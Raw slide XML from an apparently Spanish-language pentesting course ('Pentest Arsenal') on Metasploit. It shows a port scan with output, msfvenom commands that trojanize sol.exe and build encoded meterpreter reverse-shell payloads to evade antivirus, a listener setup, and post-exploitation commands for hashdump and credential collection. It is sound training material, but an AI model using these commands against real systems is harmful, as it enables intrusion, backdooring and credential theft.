              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>archivos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty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2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>permiten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evadir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> antivirus, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>generando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>únicos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</a:p>
          <a:p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062706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632"/>
            <a:ext cx="12192000" cy="678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175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7" y="1014412"/>
            <a:ext cx="1018222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27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559"/>
            <a:ext cx="12192000" cy="655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353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242"/>
            <a:ext cx="12192000" cy="642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40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7715"/>
            <a:ext cx="12192000" cy="522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05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3201"/>
            <a:ext cx="12192000" cy="473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09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515"/>
            <a:ext cx="12192000" cy="373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16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" y="1228725"/>
            <a:ext cx="1189672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326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72811" y="2077902"/>
            <a:ext cx="82463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UY" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brindar un acercamiento a técnicas y métodos de trabajo en pentesting y hacking, utilizando herramientas reales para tomar control remoto de dispositivos tecnológicos modernos.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352338"/>
            <a:ext cx="12192000" cy="1115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UY" sz="8000">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Pentest Arsenal</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="8000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="HACKED" panose="02000500000000000000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5" t="31574" r="4317" b="31388"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3804355" y="4425245"/>
            <a:ext cx="4583289" cy="112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912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" y="0"/>
            <a:ext cx="1091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80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312" y="738187"/>
            <a:ext cx="7191375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95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7649"/>
            <a:ext cx="12192000" cy="446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98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414"/>
            <a:ext cx="12192000" cy="595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04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47" y="0"/>
            <a:ext cx="99173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083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69" y="0"/>
            <a:ext cx="10756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134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112" y="57150"/>
            <a:ext cx="5057775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907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625" y="1660850"/>
            <a:ext cx="9238750" cy="353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90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839755" y="514879"/>
            <a:ext cx="10478278" cy="5632311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msf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exploit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ms08_067_netapi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) &gt; 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13C16A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use 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13C16A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>auxiliary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13C16A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/scanner/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13C16A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>portscan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13C16A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13C16A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp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msf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auxiliary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tcp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) &gt; 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13C16A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set RHOSTS 192.168.218.0/24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RHOSTS =&gt; 192.168.218.0/24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msf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auxiliary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tcp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) &gt; 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13C16A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set THREADS 50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THREADS =&gt; 50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msf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auxiliary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tcp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) &gt; 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13C16A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set PORTS 445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PORTS =&gt; 445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msf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auxiliary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tcp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) &gt; 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13C16A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[*]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Scanned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027 of 256 hosts (010% complete)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[*]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Scanned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052 of 256 hosts (020% complete)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[*]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Scanned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079 of 256 hosts (030% complete)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[*]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Scanned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103 of 256 hosts (040% complete)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[*]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Scanned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128 of 256 hosts (050% complete)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[*]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192.168.218.136:445 - TCP OPEN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[*]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Scanned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154 of 256 hosts (060% complete)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[*]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Scanned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180 of 256 hosts (070% complete)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[*]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Scanned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210 of 256 hosts (082% complete)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[*]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Scanned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232 of 256 hosts (090% complete)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[*]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Scanned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256 of 256 hosts (100% complete)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[*]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Auxiliary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module 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execution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completed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msf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auxiliary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UY" altLang="es-UY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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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) &gt;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UY" altLang="es-UY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05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083"/>
            <a:ext cx="12192000" cy="11751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01630" y="209725"/>
            <a:ext cx="9378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Y" sz="3200" dirty="0" err="1"/>
              <a:t>Msfpaylod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0" err="1"/>
              <a:t>Msfencoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0" err="1"/>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3200" dirty="0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3872822"/>
            <a:ext cx="12192000" cy="1723549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root@kali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:~# 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339966"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msfvenom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339966"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -a x86 --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339966"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>platform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33996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339966"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>windows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339966"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -x sol.exe -k -p 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339966"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>windows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339966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339966"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>messagebox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33996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339966"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lhost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339966"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=192.168.101.133 -b "\x00" -f exe -o sol_bdoor.exe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Found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10 compatible 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encoders</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="DDDDDD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Attempting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1 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iterations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of x86/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shikata_ga_nai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x86/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shikata_ga_nai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succeeded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299 (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iteration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=0) x86/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shikata_ga_nai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chosen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final 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299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: 299 bytes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sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1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Saved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rgbClr val="DDDDDD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as: sol_bdoor.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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UY" altLang="es-UY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200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00922" y="1290475"/>
            <a:ext cx="916657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UY" sz="2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UY" sz="2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whoami</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="28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endParaRPr lang="es-UY" sz="2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r>
              <a:rPr lang="es-UY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Guillermo Rodríguez</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="es-UY" sz="2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r>
              <a:rPr lang="es-UY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 años en seguridad de la información</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="es-UY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r>
              <a:rPr lang="es-UY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Certified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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UY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Ethical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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Hacker – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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ECC84496186763</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="es-UY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r>
              <a:rPr lang="es-UY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 años en Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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Advisor</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY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endParaRPr lang="es-UY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r>
              <a:rPr lang="es-UY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Actualmente en Intradós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99" t="7407" r="22670"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2889956" cy="685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60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209725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Y" sz="3200" dirty="0"/>
              <a:t>Utilidades </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0" err="1"/>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3200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903508" y="1915129"/>
            <a:ext cx="2581375" cy="307777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sz="20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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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-l </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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encoders</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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UY" altLang="es-UY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4111142"/>
            <a:ext cx="12191999" cy="923330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UY" altLang="es-UY" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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-p </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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LHOST=192.168.0.3 LPORT=4444 -f </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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raw</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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-e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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-i 5 |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\ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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-a x86 --</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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platform</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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es-UY" altLang="es-UY" sz="20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windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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-e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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countdown</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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-i 8 -f </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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raw</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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|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altLang="es-UY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\ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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-a x86 --</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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platform</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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es-UY" altLang="es-UY" sz="20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windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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-e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY" sz="20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shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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-i 9 -f exe -o payload.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" altLang="es-UY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UY" altLang="es-UY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" y="1331273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Y" sz="2400" dirty="0"/>
              <a:t>Listado de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0" err="1"/>
              <a:t>encoders</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY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-1" y="3450341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Y" sz="2400" dirty="0" err="1"/>
              <a:t>Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0"/>
              <a:t> encadenado</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20537175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19470" y="1119672"/>
            <a:ext cx="900404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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> solo se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>crea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> el payload, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>falta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu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Ubuntu"/>
              </a:rPr>
              <a:t>crear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> el listener que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>permitirá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu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Ubuntu"/>
              </a:rPr>
              <a:t>aceptar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>conexión</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu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Ubuntu"/>
              </a:rPr>
              <a:t>reversa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>explotación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Ubuntu"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>Para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t>ello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu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Ubuntu"/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu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Ubuntu"/>
              </a:rPr>
              <a:t>una</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Ubuntu"/>
              </a:rPr>
              <a:t> terminal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="inherit"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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inherit"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t> use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base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inherit"/>
              </a:rPr>
              <a:t>set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="inherit"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base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inherit"/>
              </a:rPr>
              <a:t>set LHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>192.168.23.103</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base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inherit"/>
              </a:rPr>
              <a:t>set LPORT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base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inherit"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000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26515522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01630" y="209725"/>
            <a:ext cx="9378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Y" sz="3200" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY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202377" y="794500"/>
            <a:ext cx="11977396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400" dirty="0" err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>idletime</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> c:\\boot.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> edit.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> -f cmd.exe -i -H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>run post/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>gather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>run post/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>gather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>credential_collector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>migrate</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>run post/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>manage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
